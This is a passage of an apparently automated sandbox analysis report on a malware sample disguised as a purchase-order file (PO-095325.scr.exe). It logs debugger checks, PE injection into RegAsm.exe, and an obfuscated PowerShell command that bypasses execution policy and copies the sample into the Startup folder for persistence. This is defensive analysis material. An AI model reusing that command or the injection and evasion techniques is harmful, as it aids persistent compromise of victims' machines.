                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: RegAsm.exe, 00000004.00000002.4468158129.00000000064E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01607ED0 CheckRemoteDebuggerPresent,4_2_01607ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 106C008Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" ??????????-??????????e??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????p??????????o??????????l??????????i??????????c??????????y?????????? ??????????b??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????c?????????o?????????p?????????y?????????-?????????i?????????t?????????e?????????m 'c:\users\user\desktop\po-095325.scr.exe' 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\command-line.exe'
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" ??????????-??????????e??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????p??????????o??????????l??????????i??????????c??????????y?????????? ??????????b??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????c?????????o?????????p?????????y?????????-?????????i?????????t?????????e?????????m 'c:\users\user\desktop\po-095325.scr.exe' 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\command-line.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeQueries volume information: C:\Users\user\Desktop\PO-095325.scr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
